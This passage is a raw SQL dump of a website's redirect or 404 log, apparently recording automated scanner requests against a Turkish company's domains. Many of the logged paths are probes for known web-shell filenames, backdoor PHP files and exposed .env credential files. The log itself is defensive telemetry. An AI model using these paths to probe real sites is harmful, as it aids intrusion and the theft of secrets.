00:00:00',301),(58778,'http://3s-technologies.com.tr/tr/0bb45ctt.php',NULL,'','',2,0,'2026-02-28 12:56:30','0000-00-00 00:00:00',301),(58779,'http://3s-technologies.com.tr/tr/ws80.php',NULL,'','',62,0,'2026-02-28 12:56:30','0000-00-00 00:00:00',301),(58780,'http://3s-technologies.com.tr/tr/tx79.php',NULL,'','',45,0,'2026-02-28 12:56:31','0000-00-00 00:00:00',301),(58781,'http://3s-technologies.com.tr/tr/f6ijmjpa.php',NULL,'','',2,0,'2026-02-28 12:56:35','0000-00-00 00:00:00',301),(58782,'http://3s-technologies.com.tr/tr/wp_jvml8v37.php',NULL,'','',2,0,'2026-02-28 12:56:36','0000-00-00 00:00:00',301),(58783,'http://3s-technologies.com.tr/tr/ws81.php',NULL,'','',38,0,'2026-02-28 12:56:37','0000-00-00 00:00:00',301),(58784,'http://3s-technologies.com.tr/tr/e31hmf9b.php',NULL,'','',2,0,'2026-02-28 12:56:38','0000-00-00 00:00:00',301),(58785,'http://3s-technologies.com.tr/tr/signon.php?p=',NULL,'','',2,0,'2026-02-28 23:20:15','0000-00-00 00:00:00',301),(58786,'http://3s-technologies.com.tr/tr/wp-xmlmp.php',NULL,'','',1,0,'2026-02-28 23:20:19','0000-00-00 00:00:00',301),(58787,'http://3s-technologies.com.tr/tr/wp-configssss.php',NULL,'','',1,0,'2026-02-28 23:20:20','0000-00-00 00:00:00',301),(58788,'http://3s-technologies.com.tr/tr/ngif.php',NULL,'','',1,0,'2026-02-28 23:20:21','0000-00-00 00:00:00',301),(58789,'http://3s-technologies.com.tr/tr/file.phpa',NULL,'','',1,0,'2026-02-28 23:20:24','0000-00-00 00:00:00',301),(58790,'http://3s-technologies.com.tr/tr/qr.php',NULL,'','',1,0,'2026-03-01 07:12:39','0000-00-00 00:00:00',301),(58791,'http://3s-technologies.com.tr/tr/fleen.php',NULL,'','',24,0,'2026-03-01 07:12:47','0000-00-00 00:00:00',301),(58792,'http://3s-technologies.com.tr/tr/wp-tem.php',NULL,'','',18,0,'2026-03-01 07:12:47','0000-00-00 00:00:00',301),(58793,'http://3s-technologies.com.tr/tr/av6m.php',NULL,'','',11,0,'2026-03-01 07:12:48','0000-00-00 00:00:00',301),(58794,'http://3s-technologies.com.tr/tr/autogooey.php',NULL,'','',23,0,'2026-03-01 07:12:49','0000-00-00 00:00:00',301),(58795,'http://3s-technologies.com.tr/tr/btx25.php',NULL,'','',21,0,'2026-03-01 07:12:50','0000-00-00 00:00:00',301),(58796,'http://3s-technologies.com.tr/tr/maxro.php',NULL,'','',37,0,'2026-03-01 07:12:51','0000-00-00 00:00:00',301),(58797,'http://3s-technologies.com.tr/tr/agg.php',NULL,'','',19,0,'2026-03-01 07:12:52','0000-00-00 00:00:00',301),(58798,'http://3s-technologies.com.tr/tr/g-in.php',NULL,'','',21,0,'2026-03-01 07:12:54','0000-00-00 00:00:00',301),(58799,'http://3s-technologies.com.tr/tr/w4.php',NULL,'','',11,0,'2026-03-01 07:13:48','0000-00-00 00:00:00',301),(58800,'http://3s-technologies.com.tr/tr/tymn.php?p=',NULL,'','',6,0,'2026-03-01 07:13:51','0000-00-00 00:00:00',301),(58801,'http://mail.3s-technologies.com.tr/tr/path.php',NULL,'','',27,0,'2026-03-01 12:58:32','0000-00-00 00:00:00',301),(58802,'http://mail.3s-technologies.com.tr/tr/fleen.php',NULL,'','',13,0,'2026-03-01 12:58:34','0000-00-00 00:00:00',301),(58803,'http://mail.3s-technologies.com.tr/tr/wp-tem.php',NULL,'','',14,0,'2026-03-01 12:58:34','0000-00-00 00:00:00',301),(58804,'http://mail.3s-technologies.com.tr/tr/avim.php',NULL,'','',2,0,'2026-03-01 12:58:35','0000-00-00 00:00:00',301),(58805,'http://mail.3s-technologies.com.tr/tr/autogooey.php',NULL,'','',12,0,'2026-03-01 12:58:36','0000-00-00 00:00:00',301),(58806,'http://mail.3s-technologies.com.tr/tr/btx25.php',NULL,'','',11,0,'2026-03-01 12:58:37','0000-00-00 00:00:00',301),(58807,'http://mail.3s-technologies.com.tr/tr/maxro.php',NULL,'','',20,0,'2026-03-01 12:58:38','0000-00-00 00:00:00',301),(58808,'http://mail.3s-technologies.com.tr/tr/agg.php',NULL,'','',15,0,'2026-03-01 12:58:38','0000-00-00 00:00:00',301),(58809,'http://mail.3s-technologies.com.tr/tr/wsws.php',NULL,'','',2,0,'2026-03-01 12:58:40','0000-00-00 00:00:00',301),(58810,'http://mail.3s-technologies.com.tr/tr/g-in.php',NULL,'','',16,0,'2026-03-01 12:58:40','0000-00-00 00:00:00',301),(58811,'http://mail.3s-technologies.com.tr/tr/loxi-o.php',NULL,'','',2,0,'2026-03-01 12:58:42','0000-00-00 00:00:00',301),(58812,'http://mail.3s-technologies.com.tr/tr/olfclass.php',NULL,'','',2,0,'2026-03-01 12:58:45','0000-00-00 00:00:00',301),(58813,'http://www.3s-technologies.com.tr/tr/sty.php',NULL,'','',1,0,'2026-03-01 15:18:26','0000-00-00 00:00:00',301),(58814,'http://www.3s-technologies.com.tr/tr/txets.php',NULL,'','',3,0,'2026-03-01 15:18:29','0000-00-00 00:00:00',301),(58815,'http://www.3s-technologies.com.tr/tr/wp9.php',NULL,'','',7,0,'2026-03-01 15:18:30','0000-00-00 00:00:00',301),(58816,'http://www.3s-technologies.com.tr/tr/path.php',NULL,'','',2,0,'2026-03-01 15:18:31','0000-00-00 00:00:00',301),(58817,'http://www.3s-technologies.com.tr/tr/wdf.php',NULL,'','',1,0,'2026-03-01 15:18:31','0000-00-00 00:00:00',301),(58818,'http://www.3s-technologies.com.tr/tr/fleen.php',NULL,'','',1,0,'2026-03-01 15:18:31','0000-00-00 00:00:00',301),(58819,'http://www.3s-technologies.com.tr/tr/wp-tem.php',NULL,'','',2,0,'2026-03-01 15:18:32','0000-00-00 00:00:00',301),(58820,'http://www.3s-technologies.com.tr/tr/avim.php',NULL,'','',1,0,'2026-03-01 15:18:32','0000-00-00 00:00:00',301),(58821,'http://www.3s-technologies.com.tr/tr/autogooey.php',NULL,'','',1,0,'2026-03-01 15:18:33','0000-00-00 00:00:00',301),(58822,'http://www.3s-technologies.com.tr/tr/btx25.php',NULL,'','',1,0,'2026-03-01 15:18:33','0000-00-00 00:00:00',301),(58823,'http://www.3s-technologies.com.tr/tr/maxro.php',NULL,'','',2,0,'2026-03-01 15:18:34','0000-00-00 00:00:00',301),(58824,'http://www.3s-technologies.com.tr/tr/agg.php',NULL,'','',2,0,'2026-03-01 15:18:35','0000-00-00 00:00:00',301),(58825,'http://www.3s-technologies.com.tr/tr/pass4.php',NULL,'','',3,0,'2026-03-01 15:18:35','0000-00-00 00:00:00',301),(58826,'http://www.3s-technologies.com.tr/tr/wsws.php',NULL,'','',1,0,'2026-03-01 15:18:36','0000-00-00 00:00:00',301),(58827,'http://www.3s-technologies.com.tr/tr/g-in.php',NULL,'','',2,0,'2026-03-01 15:18:36','0000-00-00 00:00:00',301),(58828,'http://www.3s-technologies.com.tr/tr/loxi-o.php',NULL,'','',1,0,'2026-03-01 15:18:38','0000-00-00 00:00:00',301),(58829,'http://www.3s-technologies.com.tr/tr/olfclass.php',NULL,'','',1,0,'2026-03-01 15:18:42','0000-00-00 00:00:00',301),(58830,'http://www.3s-technologies.com.tr/tr/wpver.php',NULL,'','',1,0,'2026-03-01 15:18:44','0000-00-00 00:00:00',301),(58831,'http://www.3s-technologies.com.tr/tr/public/hi.php',NULL,'','',1,0,'2026-03-01 15:18:45','0000-00-00 00:00:00',301),(58832,'http://www.3s-technologies.com.tr/tr/zc-318.php',NULL,'','',1,0,'2026-03-01 15:18:47','0000-00-00 00:00:00',301),(58833,'http://www.3s-technologies.com.tr/tr/dom.php',NULL,'','',1,0,'2026-03-01 15:18:48','0000-00-00 00:00:00',301),(58834,'http://www.3s-technologies.com.tr/tr/ebahvhhh.php',NULL,'','',1,0,'2026-03-01 15:18:50','0000-00-00 00:00:00',301),(58835,'http://www.3s-technologies.com.tr/tr/snq.php',NULL,'','',1,0,'2026-03-01 15:18:50','0000-00-00 00:00:00',301),(58836,'http://www.3s-technologies.com.tr/tr/public/wp-blog.php',NULL,'','',2,0,'2026-03-01 15:18:52','0000-00-00 00:00:00',301),(58837,'http://www.3s-technologies.com.tr/tr/bsg-management/php.php',NULL,'','',1,0,'2026-03-01 15:18:54','0000-00-00 00:00:00',301),(58838,'http://www.3s-technologies.com.tr/tr/ws61.php',NULL,'','',2,0,'2026-03-01 15:18:55','0000-00-00 00:00:00',301),(58839,'http://www.3s-technologies.com.tr/tr/ws59.php',NULL,'','',1,0,'2026-03-01 15:18:57','0000-00-00 00:00:00',301),(58840,'http://www.3s-technologies.com.tr/tr/mamzi.php',NULL,'','',1,0,'2026-03-01 15:18:58','0000-00-00 00:00:00',301),(58841,'http://www.3s-technologies.com.tr/tr/ws60.php',NULL,'','',2,0,'2026-03-01 15:19:00','0000-00-00 00:00:00',301),(58842,'http://www.3s-technologies.com.tr/tr/dsd.php',NULL,'','',1,0,'2026-03-01 15:19:02','0000-00-00 00:00:00',301),(58843,'http://www.3s-technologies.com.tr/tr/guk.php',NULL,'','',1,0,'2026-03-01 15:19:02','0000-00-00 00:00:00',301),(58844,'http://www.3s-technologies.com.tr/tr/file52.php',NULL,'','',1,0,'2026-03-01 15:19:04','0000-00-00 00:00:00',301),(58845,'http://www.3s-technologies.com.tr/tr/tax.php',NULL,'','',1,0,'2026-03-01 15:19:04','0000-00-00 00:00:00',301),(58846,'http://www.3s-technologies.com.tr/tr/brc.php',NULL,'','',1,0,'2026-03-01 15:19:06','0000-00-00 00:00:00',301),(58847,'http://www.3s-technologies.com.tr/tr/koiy.php',NULL,'','',3,0,'2026-03-01 15:19:06','0000-00-00 00:00:00',301),(58848,'http://www.3s-technologies.com.tr/tr/fr/ms.php',NULL,'','',1,0,'2026-03-01 15:19:08','0000-00-00 00:00:00',301),(58849,'http://www.3s-technologies.com.tr/tr/rum.php',NULL,'','',1,0,'2026-03-01 15:19:10','0000-00-00 00:00:00',301),(58850,'http://www.3s-technologies.com.tr/tr/ws62.php',NULL,'','',1,0,'2026-03-01 15:19:13','0000-00-00 00:00:00',301),(58851,'http://www.3s-technologies.com.tr/tr/cxc.php',NULL,'','',1,0,'2026-03-01 15:19:16','0000-00-00 00:00:00',301),(58852,'http://www.3s-technologies.com.tr/tr/gjm.php',NULL,'','',1,0,'2026-03-01 15:19:16','0000-00-00 00:00:00',301),(58853,'http://www.3s-technologies.com.tr/tr/wpo.php',NULL,'','',1,0,'2026-03-01 15:19:18','0000-00-00 00:00:00',301),(58854,'http://www.3s-technologies.com.tr/tr/sadd.php',NULL,'','',1,0,'2026-03-01 15:19:20','0000-00-00 00:00:00',301),(58855,'http://www.3s-technologies.com.tr/tr/nzv.php',NULL,'','',1,0,'2026-03-01 15:19:24','0000-00-00 00:00:00',301),(58856,'http://www.3s-technologies.com.tr/tr/nhr.php',NULL,'','',1,0,'2026-03-01 15:19:26','0000-00-00 00:00:00',301),(58857,'http://www.3s-technologies.com.tr/tr/ws79.php',NULL,'','',1,0,'2026-03-01 15:19:27','0000-00-00 00:00:00',301),(58858,'http://www.3s-technologies.com.tr/tr/1061.php',NULL,'','',1,0,'2026-03-01 15:19:27','0000-00-00 00:00:00',301),(58859,'http://www.3s-technologies.com.tr/tr/xmy.php',NULL,'','',1,0,'2026-03-01 15:19:32','0000-00-00 00:00:00',301),(58860,'http://www.3s-technologies.com.tr/tr/fun.php',NULL,'','',1,0,'2026-03-01 15:19:32','0000-00-00 00:00:00',301),(58861,'http://www.3s-technologies.com.tr/tr/end.php',NULL,'','',1,0,'2026-03-01 15:19:33','0000-00-00 00:00:00',301),(58862,'http://www.3s-technologies.com.tr/tr/ah25.php',NULL,'','',2,0,'2026-03-01 15:19:33','0000-00-00 00:00:00',301),(58863,'http://www.3s-technologies.com.tr/tr/wp-admin/sc.php',NULL,'','',1,0,'2026-03-01 15:19:36','0000-00-00 00:00:00',301),(58864,'http://www.3s-technologies.com.tr/tr/rpk.php',NULL,'','',1,0,'2026-03-01 15:19:38','0000-00-00 00:00:00',301),(58865,'http://www.3s-technologies.com.tr/tr/get.php',NULL,'','',1,0,'2026-03-01 15:19:41','0000-00-00 00:00:00',301),(58866,'http://www.3s-technologies.com.tr/tr/sxdfrt.php',NULL,'','',1,0,'2026-03-01 15:19:48','0000-00-00 00:00:00',301),(58867,'http://www.3s-technologies.com.tr/tr/zz.php',NULL,'','',1,0,'2026-03-01 15:19:51','0000-00-00 00:00:00',301),(58868,'http://www.3s-technologies.com.tr/tr/sdsa.php',NULL,'','',1,0,'2026-03-01 15:19:52','0000-00-00 00:00:00',301),(58869,'http://mail.3s-technologies.com.tr/tr/signon.php?p=',NULL,'','',1,0,'2026-03-01 16:18:41','0000-00-00 00:00:00',301),(58870,'http://mail.3s-technologies.com.tr/tr/wp-xmlmp.php',NULL,'','',1,0,'2026-03-01 16:18:44','0000-00-00 00:00:00',301),(58871,'http://mail.3s-technologies.com.tr/tr/wp-configssss.php',NULL,'','',1,0,'2026-03-01 16:18:46','0000-00-00 00:00:00',301),(58872,'http://mail.3s-technologies.com.tr/tr/wp-configss1.php',NULL,'','',1,0,'2026-03-01 16:18:47','0000-00-00 00:00:00',301),(58873,'http://mail.3s-technologies.com.tr/tr/ngif.php',NULL,'','',1,0,'2026-03-01 16:18:47','0000-00-00 00:00:00',301),(58874,'http://mail.3s-technologies.com.tr/tr/wp-configss.php',NULL,'','',2,0,'2026-03-01 16:18:48','0000-00-00 00:00:00',301),(58875,'http://mail.3s-technologies.com.tr/tr/file.phpa',NULL,'','',1,0,'2026-03-01 16:18:49','0000-00-00 00:00:00',301),(58876,'http://mail.3s-technologies.com.tr/tr/defaults.php',NULL,'','',5,0,'2026-03-01 16:18:50','0000-00-00 00:00:00',301),(58877,'http://mail.3s-technologies.com.tr/tr/cache-compat.php',NULL,'','',2,0,'2026-03-01 16:18:52','0000-00-00 00:00:00',301),(58878,'http://mail.3s-technologies.com.tr/tr/otuz1.php',NULL,'','',1,0,'2026-03-01 16:18:55','0000-00-00 00:00:00',301),(58879,'http://mail.3s-technologies.com.tr/tr/alfanew.php7',NULL,'','',3,0,'2026-03-01 16:19:01','0000-00-00 00:00:00',301),(58880,'http://mail.3s-technologies.com.tr/tr/ajax-actions.php',NULL,'','',3,0,'2026-03-01 16:19:02','0000-00-00 00:00:00',301),(58881,'http://3s-technologies.com.tr/tr/swallowable.php',NULL,'','',23,0,'2026-03-01 22:17:10','0000-00-00 00:00:00',301),(58882,'http://mail.3s-technologies.com.tr/tr/av6m.php',NULL,'','',6,0,'2026-03-02 01:00:58','0000-00-00 00:00:00',301),(58883,'http://mail.3s-technologies.com.tr/tr/w4.php',NULL,'','',5,0,'2026-03-02 01:01:45','0000-00-00 00:00:00',301),(58884,'http://mail.3s-technologies.com.tr/tr/tymn.php?p=',NULL,'','',2,0,'2026-03-02 01:01:47','0000-00-00 00:00:00',301),(58885,'https://3s-technologies.com.tr/tr/mailcoach/.env',NULL,'https://3s-technologies.com.tr/mailcoach/.env','',1,0,'2026-03-02 10:58:11','0000-00-00 00:00:00',301),(58886,'https://3s-technologies.com.tr/tr/backend',NULL,'https://3s-technologies.com.tr/backend/','',1,0,'2026-03-02 10:58:11','0000-00-00 00:00:00',301),(58887,'https://3s-technologies.com.tr/tr/mailer/.env',NULL,'https://3s-technologies.com.tr/mailer/.env','',1,0,'2026-03-02 10:58:12','0000-00-00 00:00:00',301),(58888,'https://3s-technologies.com.tr/tr/lara/.env',NULL,'https://3s-technologies.com.tr/lara/.env','',1,0,'2026-03-02 10:58:12','0000-00-00 00:00:00',301),(58889,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/cah.php',NULL,'','',1,0,'2026-03-02 13:16:49','0000-00-00 00:00:00',301),(58890,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/pwnd/acp.php',NULL,'','',1,0,'2026-03-02 13:16:50','0000-00-00 00:00:00',301),(58891,'http://mail.3s-technologies.com.tr/tr/as1337.php',NULL,'','',1,0,'2026-03-02 13:16:58','0000-00-00 00:00:00',301),(58892,'http://mail.3s-technologies.com.tr/tr/wolf-shell.php',NULL,'','',1,0,'2026-03-02 13:17:00','0000-00-00 00:00:00',301),(58893,'http://mail.3s-technologies.com.tr/tr/asf.php',NULL,'','',1,0,'2026-03-02 13:17:02','0000-00-00 00:00:00',301),(58894,'http://mail.3s-technologies.com.tr/tr/sa.php',NULL,'','',1,0,'2026-03-02 13:17:02','0000-00-00 00:00:00',301),(58895,'http://mail.3s-technologies.com.tr/tr/wp-content/cc13.php',NULL,'','',1,0,'2026-03-02 15:08:41','0000-00-00 00:00:00',301),(58896,'http://mail.3s-technologies.com.tr/tr/xtsr.php',NULL,'','',2,0,'2026-03-02 15:08:51','0000-00-00 00:00:00',301),(58897,'http://mail.3s-technologies.com.tr/tr/masks.php',NULL,'','',2,0,'2026-03-02 15:08:52','0000-00-00 00:00:00',301),(58898,'http://mail.3s-technologies.com.tr/tr/jb33.php',NULL,'','',1,0,'2026-03-02 15:08:53','0000-00-00 00:00:00',301),(58899,'http://mail.3s-technologies.com.tr/tr/vogme.php',NULL,'','',1,0,'2026-03-02 15:08:54','0000-00-00 00:00:00',301),(58900,'http://mail.3s-technologies.com.tr/tr/as.php',NULL,'','',1,0,'2026-03-02 15:08:57','0000-00-00 00:00:00',301),(58901,'http://mail.3s-technologies.com.tr/tr/ahgag.php',NULL,'','',1,0,'2026-03-02 15:08:59','0000-00-00 00:00:00',301),(58902,'http://mail.3s-technologies.com.tr/tr/yoawv.php',NULL,'','',1,0,'2026-03-02 15:09:00','0000-00-00 00:00:00',301),(58903,'http://mail.3s-technologies.com.tr/tr/xogve.php',NULL,'','',1,0,'2026-03-02 15:09:01','0000-00-00 00:00:00',301),(58904,'http://mail.3s-technologies.com.tr/tr/torsa1.php',NULL,'','',22,0,'2026-03-02 15:09:02','0000-00-00 00:00:00',301),(58905,'http://mail.3s-technologies.com.tr/tr/uxijj.php',NULL,'','',5,0,'2026-03-02 15:09:04','0000-00-00 00:00:00',301),(58906,'http://mail.3s-technologies.com.tr/tr/rkiea.php',NULL,'','',4,0,'2026-03-02 15:09:05','0000-00-00 00:00:00',301),(58907,'http://mail.3s-technologies.com.tr/tr/ppxhp.php',NULL,'','',1,0,'2026-03-02 15:09:06','0000-00-00 00:00:00',301),(58908,'http://mail.3s-technologies.com.tr/tr/yclby.php',NULL,'','',1,0,'2026-03-02 15:09:08','0000-00-00 00:00:00',301),(58909,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/bal.php',NULL,'','',1,0,'2026-03-02 15:09:15','0000-00-00 00:00:00',301),(58910,'http://mail.3s-technologies.com.tr/tr/state.php',NULL,'','',8,0,'2026-03-02 15:09:19','0000-00-00 00:00:00',301),(58911,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/mediiaa-widget-video.php',NULL,'','',1,0,'2026-03-02 15:19:29','0000-00-00 00:00:00',301),(58912,'http://mail.3s-technologies.com.tr/tr/.well-known/nastar.php',NULL,'','',6,0,'2026-03-02 15:19:30','0000-00-00 00:00:00',301),(58913,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/bk.php',NULL,'','',1,0,'2026-03-02 15:19:30','0000-00-00 00:00:00',301),(58914,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/x6.php',NULL,'','',1,0,'2026-03-02 15:19:31','0000-00-00 00:00:00',301),(58915,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/widgets.sys.php',NULL,'','',1,0,'2026-03-02 15:19:35','0000-00-00 00:00:00',301),(58916,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/hp2.php',NULL,'','',1,0,'2026-03-02 15:19:35','0000-00-00 00:00:00',301),(58917,'http://mail.3s-technologies.com.tr/tr/wp-includes/jga.php',NULL,'','',1,0,'2026-03-02 15:19:36','0000-00-00 00:00:00',301),(58918,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/vc.php',NULL,'','',1,0,'2026-03-02 15:19:37','0000-00-00 00:00:00',301),(58919,'http://mail.3s-technologies.com.tr/tr/wp-includes/widgets/widget-cache.php',NULL,'','',1,0,'2026-03-02 15:19:37','0000-00-00 00:00:00',301),(58920,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-wp-json-ajax.php',NULL,'','',1,0,'2026-03-02 15:19:38','0000-00-00 00:00:00',301),(58921,'http://mail.3s-technologies.com.tr/tr/files/add_gasto.php',NULL,'','',1,0,'2026-03-02 15:19:39','0000-00-00 00:00:00',301),(58922,'http://mail.3s-technologies.com.tr/tr/uploads/select_file.php',NULL,'','',1,0,'2026-03-02 15:19:39','0000-00-00 00:00:00',301),(58923,'http://mail.3s-technologies.com.tr/tr/uploads/select_file2.php',NULL,'','',1,0,'2026-03-02 15:19:40','0000-00-00 00:00:00',301),(58924,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/detmash.php',NULL,'','',1,0,'2026-03-02 15:19:41','0000-00-00 00:00:00',301),(58925,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/incl.php',NULL,'','',1,0,'2026-03-02 15:19:44','0000-00-00 00:00:00',301),(58926,'http://mail.3s-technologies.com.tr/tr/wp-includes/sitemaps/providers.php',NULL,'','',1,0,'2026-03-02 15:19:44','0000-00-00 00:00:00',301),(58927,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/403.php',NULL,'','',1,0,'2026-03-02 15:19:45','0000-00-00 00:00:00',301),(58928,'http://mail.3s-technologies.com.tr/tr/images/image.php',NULL,'','',1,0,'2026-03-02 15:19:46','0000-00-00 00:00:00',301),(58929,'http://mail.3s-technologies.com.tr/tr/images/image2.php',NULL,'','',1,0,'2026-03-02 15:19:46','0000-00-00 00:00:00',301),(58930,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/ws.php',NULL,'','',1,0,'2026-03-02 15:19:47','0000-00-00 00:00:00',301),(58931,'http://mail.3s-technologies.com.tr/tr/uploads/mandals.php',NULL,'','',1,0,'2026-03-02 15:19:48','0000-00-00 00:00:00',301),(58932,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/ws27.php',NULL,'','',1,0,'2026-03-02 15:19:48','0000-00-00 00:00:00',301),(58933,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-wp-duotone.php',NULL,'','',1,0,'2026-03-02 15:19:49','0000-00-00 00:00:00',301),(58934,'http://mail.3s-technologies.com.tr/tr/files/d.be.brow.php',NULL,'','',1,0,'2026-03-02 15:19:51','0000-00-00 00:00:00',301),(58935,'http://mail.3s-technologies.com.tr/tr/submitticket.php',NULL,'','',1,0,'2026-03-02 15:19:51','0000-00-00 00:00:00',301),(58936,'http://mail.3s-technologies.com.tr/tr/files/add_evento.php',NULL,'','',1,0,'2026-03-02 15:19:52','0000-00-00 00:00:00',301),(58937,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/goods.php',NULL,'','',1,0,'2026-03-02 15:19:53','0000-00-00 00:00:00',301),(58938,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/goods.php',NULL,'','',1,0,'2026-03-02 15:19:54','0000-00-00 00:00:00',301),(58939,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/searchforma.php',NULL,'','',1,0,'2026-03-02 15:19:54','0000-00-00 00:00:00',301),(58940,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/222.php',NULL,'','',1,0,'2026-03-02 15:19:55','0000-00-00 00:00:00',301),(58941,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/ms-site.php',NULL,'','',1,0,'2026-03-02 15:19:57','0000-00-00 00:00:00',301),(58942,'http://mail.3s-technologies.com.tr/tr/wp-includes/wp-settings2.php',NULL,'','',1,0,'2026-03-02 15:19:59','0000-00-00 00:00:00',301),(58943,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade/alfa-rex.php',NULL,'','',1,0,'2026-03-02 15:20:00','0000-00-00 00:00:00',301),(58944,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/wp-login.php',NULL,'','',1,0,'2026-03-02 15:20:01','0000-00-00 00:00:00',301),(58945,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/2026/02/index.php',NULL,'','',1,0,'2026-03-02 15:20:02','0000-00-00 00:00:00',301),(58946,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/alfa-rex.php',NULL,'','',1,0,'2026-03-02 15:20:02','0000-00-00 00:00:00',301),(58947,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/2026/01/mybackpack.php',NULL,'','',1,0,'2026-03-02 15:20:03','0000-00-00 00:00:00',301),(58948,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/rk2.php',NULL,'','',1,0,'2026-03-02 15:20:04','0000-00-00 00:00:00',301),(58949,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/error.php',NULL,'','',1,0,'2026-03-02 15:20:05','0000-00-00 00:00:00',301),(58950,'http://mail.3s-technologies.com.tr/tr/yereongu.php',NULL,'','',1,0,'2026-03-02 15:20:07','0000-00-00 00:00:00',301),(58951,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets/leuk.php',NULL,'','',1,0,'2026-03-02 15:20:08','0000-00-00 00:00:00',301),(58952,'http://mail.3s-technologies.com.tr/tr/.well-known/chris.php',NULL,'','',1,0,'2026-03-02 15:20:09','0000-00-00 00:00:00',301),(58953,'http://mail.3s-technologies.com.tr/tr/wp-includes/xx.php',NULL,'','',1,0,'2026-03-02 15:20:09','0000-00-00 00:00:00',301),(58954,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/sql.php',NULL,'','',1,0,'2026-03-02 15:20:10','0000-00-00 00:00:00',301),(58955,'http://mail.3s-technologies.com.tr/tr/uploads/wp.php',NULL,'','',1,0,'2026-03-02 15:20:11','0000-00-00 00:00:00',301),(58956,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/cores.php',NULL,'','',1,0,'2026-03-02 15:20:12','0000-00-00 00:00:00',301),(58957,'http://mail.3s-technologies.com.tr/tr/wp-includes/widgets/ws62.php',NULL,'','',1,0,'2026-03-02 15:20:12','0000-00-00 00:00:00',301),(58958,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade/worksec.php',NULL,'','',1,0,'2026-03-02 15:20:13','0000-00-00 00:00:00',301),(58959,'http://mail.3s-technologies.com.tr/tr/wp-includes/pomo/feeds.php',NULL,'','',1,0,'2026-03-02 15:20:14','0000-00-00 00:00:00',301),(58960,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/wp-good.php',NULL,'','',1,0,'2026-03-02 15:20:15','0000-00-00 00:00:00',301),(58961,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/signup_pad_classic.php',NULL,'','',1,0,'2026-03-02 15:20:15','0000-00-00 00:00:00',301),(58962,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/v2.php',NULL,'','',1,0,'2026-03-02 15:20:16','0000-00-00 00:00:00',301),(58963,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/class-ge.php',NULL,'','',1,0,'2026-03-02 15:20:17','0000-00-00 00:00:00',301),(58964,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-wp-https.php',NULL,'','',1,0,'2026-03-02 15:20:17','0000-00-00 00:00:00',301),(58965,'http://mail.3s-technologies.com.tr/tr/wp-includes/fonts/rawwp.php',NULL,'','',1,0,'2026-03-02 15:20:18','0000-00-00 00:00:00',301),(58966,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-mail.php',NULL,'','',1,0,'2026-03-02 15:20:19','0000-00-00 00:00:00',301),(58967,'http://mail.3s-technologies.com.tr/tr/.well-known/uhuybro.php',NULL,'','',1,0,'2026-03-02 15:20:20','0000-00-00 00:00:00',301),(58968,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/footers.php',NULL,'','',1,0,'2026-03-02 15:20:21','0000-00-00 00:00:00',301),(58969,'http://mail.3s-technologies.com.tr/tr/.well-known/icedknnv.php',NULL,'','',1,0,'2026-03-02 15:20:21','0000-00-00 00:00:00',301),(58970,'http://mail.3s-technologies.com.tr/tr/images/post_genprdt.php',NULL,'','',1,0,'2026-03-02 15:20:22','0000-00-00 00:00:00',301),(58971,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/by.php',NULL,'','',1,0,'2026-03-02 15:20:24','0000-00-00 00:00:00',301),(58972,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/user-ajax.php',NULL,'','',1,0,'2026-03-02 15:20:25','0000-00-00 00:00:00',301),(58973,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/chati.php',NULL,'','',1,0,'2026-03-02 15:20:25','0000-00-00 00:00:00',301),(58974,'http://mail.3s-technologies.com.tr/tr/321.php',NULL,'','',1,0,'2026-03-02 15:21:08','0000-00-00 00:00:00',301),(58975,'http://www.3s-technologies.com.tr/tr/wp-admin/js/mediiaa-widget-video.php',NULL,'','',1,0,'2026-03-02 16:15:01','0000-00-00 00:00:00',301),(58976,'http://www.3s-technologies.com.tr/tr/.well-known/nastar.php',NULL,'','',1,0,'2026-03-02 16:15:02','0000-00-00 00:00:00',301),(58977,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/bk.php',NULL,'','',1,0,'2026-03-02 16:15:02','0000-00-00 00:00:00',301),(58978,'http://www.3s-technologies.com.tr/tr/wp-admin/maint/x6.php',NULL,'','',1,0,'2026-03-02 16:15:08','0000-00-00 00:00:00',301),(58979,'http://www.3s-technologies.com.tr/tr/wp-admin/css/widgets.sys.php',NULL,'','',1,0,'2026-03-02 16:15:12','0000-00-00 